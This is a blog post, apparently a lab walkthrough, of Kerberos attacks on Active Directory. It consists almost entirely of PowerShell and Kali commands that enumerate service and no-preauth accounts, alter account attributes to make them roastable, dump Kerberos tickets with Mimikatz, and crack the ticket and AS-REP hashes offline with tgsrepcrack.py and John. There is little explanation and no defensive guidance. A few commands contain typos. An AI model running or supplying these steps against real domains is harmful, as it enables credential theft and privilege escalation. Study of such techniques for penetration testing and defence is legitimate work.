Site Loader

Find user accounts used as service accounts :

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Get-ADUser -filter {serviceprincipalname -ne “$null”} -Properties serviceprincipalname

Check if the TGS has been granted :

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> klist

Export all ticket using mimitakz :

PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::list /export”‘

https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py

PS C:\Users\victim.SECURITY\Downloads\kerberoast-master\kerberoast-master> python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt .\2-40a50000-victim@ldap~WIN-2RUMVG5JPOC.security.local~security.local-SECURITY.LOCAL.kirbi

By this we get the password through ticket

Enumerating accounts with kerberos preauth disabled :

Using powerview (dev)

PS C:\Users\victim.SECURITY\Downloads> Get-DomainUser –PreauthNotRequired –Verbose

Using Active Directory module :

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Get-ADUser -filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Let’s enumerate the permissions for RDPUsers on ACL using powerview :

https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Modules/PowerView_dev.ps1

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Import-Module .\powerview_dev.ps1

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match “”}

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Set-DomainObject -Identity DESKTOP-EL1JRUA -XOR @{useraccountcontrol=4194304} –Verbose

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-DomainUser -PreauthNotRequired –Verbose

Requested encrypted AS-REP for offline brute force :

Let’s use ASREPRoast

https://github.com/HarmJ0y/ASREPRoast

To enumerate all users with krberos preauth disabled & a request a hash

PS C:\Users\victim.SECURITY\Downloads\ASREPRoast-master\ASREPRoast-master> . .\ASREPRoast.ps1

PS C:\Users\victim.SECURITY\Downloads\ASREPRoast-master\ASREPRoast-master> Get-ASREPHash -username DESKTOP-EL1JRUA –verbose

We get the output  now on kali linux

Root@kali:~# cat user

Paste the above hash value and save it

root@kali:~# ./john user –wordlist=wordlist.txt

we get the password

Using powerview see if the user already has a SPN :

PS C:\Users\victim.SECURITY\Downloads\ASREPRoast-master\ASREPRoast-master> Get-DomainUser -Identity administrator | select serviceprincipalname

Using active directory module :

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Get-ADUser -Identity administrator -Properties serviceprincipalName | select sericeprincipalName

Set a SPN for the user (must be unique for the domain )

Set-domainobject –identity victim5 –set @{ ServicePrincipalNames=’ops/whatever1’}

Using active directory module :

PS C:\Users\victim1\Downloads\ADModule-master\ADModule-master> Set-ADUser -Identity victim5 -ServicePrincipalNames @{add=’ops/whatever1′}

PS C:\Users\victim3\Downloads\tool\tool\ASREPRoast-master\ASREPRoast-master> Get-DomainUser -Identity victim5 | select serviceprincipalname

Request a ticket :

PS C:\Users\victim3\Downloads\tool\tool\kerberoast-master\kerberoast-master> Add-Type -AssemblyName system.identitymodel

PS C:\Users\victim3\Downloads\tool\tool\kerberoast-master\kerberoast-master> new-object system.identitymodel.tokens.kerberosrequestorsecuritytoken -ArgumentList “ops/whatever1”

Check if the ticket has been granted :

PS C:\Users\victim3\Downloads\tool\tool\kerberoast-master\kerberoast-master> klist

Export all tickets using mimikatz:

PS C:\Users\victim3\Downloads\tool\tool\kerberoast-master\kerberoast-master> Invoke-Mimikatz -Command ‘”kerberos::list /export”‘

We can crack the password by this .

PS C:\Users\victim3\Downloads\tool\tool\kerberoast-master\kerberoast-master> python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt .\2-40a10000-administrator@ops~whatever1-SECURITY.LOCAL.kirbi

@saksham-dixit

Post Author: Saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *